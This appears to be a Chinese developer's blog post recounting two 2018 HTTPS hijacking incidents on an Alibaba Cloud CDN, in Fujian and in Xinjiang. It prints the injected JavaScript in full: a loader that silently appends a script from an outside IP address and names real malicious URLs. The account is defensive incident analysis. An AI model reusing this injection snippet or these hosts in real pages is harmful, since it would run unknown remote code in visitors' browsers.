公司在全国大部分地区都有业务,使用了阿里云作为 CDN 提供商,全链路使用 HTTPS 协议,证书是在阿里云申请的。
2018 年 1 月份出现过一次福建地区 HTTPS 被劫持,一个 js 资源被 302 至 https://ts.olyoneshop.com/rouyf/ghytuj/gyytru2.js 后将整个页面跳转至第三方页面。
由于是 HTTPS 协议被劫持,当时胡思乱想了一通 GFW 省级节点之类的想法,不过最后证明时出现了被迫害妄想症(哈哈,想多了)。
原因是由于阿里云 CDN 内部使用 HTTP 协议,在两个节点中间的数据传输,被中间链路中的某家运营商劫持了(具体哪家没说),内部改为 HTTPS 协议解决。
2018 年 10 月又在新疆地区出现 HTTPS 被劫持,随机某个 js 资源被替换为一段代码,动态注入原始 js 资源和 http://39.106.146.43:1616/mb.php?id=kh03 输出的 js 资源。
关键在于其代码水平过于低劣,劫持了 HTTPS 协议的 js 资源,却试图动态写入 HTTP 协议的 js 资源,妥妥的被浏览器的安全策略拦截了,造成正常页面出现错误。
联系了阿里云客服,确认 CDN 上的文件 MD5 是正常的。而在本地直接访问被注入的 url 链接无任何响应输出,且经查询得知 39.106.146.43 属于北京市阿里云机房(也有一说香港)。
不同于上次福建地区劫持的恶意页面跳转,本次新疆地区劫持试图悄悄注入未知功能的脚本,只是因为水平低劣而暴漏,于是被迫害妄想症又冒了上来(不回来真的吧)。
目前联系了客服,刷新了一下 CDN 缓存。至少测试的部分地区看起来已经正常了,至于是否完全正常,只有阿里云知道了。
|
1 |
(function() { if (typeof MBFLAGST == 'undefined') { MBFLAGST = 1; var e,h=document.getElementsByTagName('head')[0];e= document.createElement('script');e.src = 'http://xxx.com/xxx.js?cclt1=ncache2'+Math.random();e.type = 'text/javascript';h.appendChild(e); if(navigator.platform && (!navigator.platform.match(/Win32|Win64/i)) ) {e = document.createElement('script');e.src = 'http://39.106.146.43:1616/mb.php?id=kh03';e.type = 'text/javascript';h.appendChild(e);} }})(); |
后续还是出现了劫持,阿里云再次给出使用年初的解决方案。 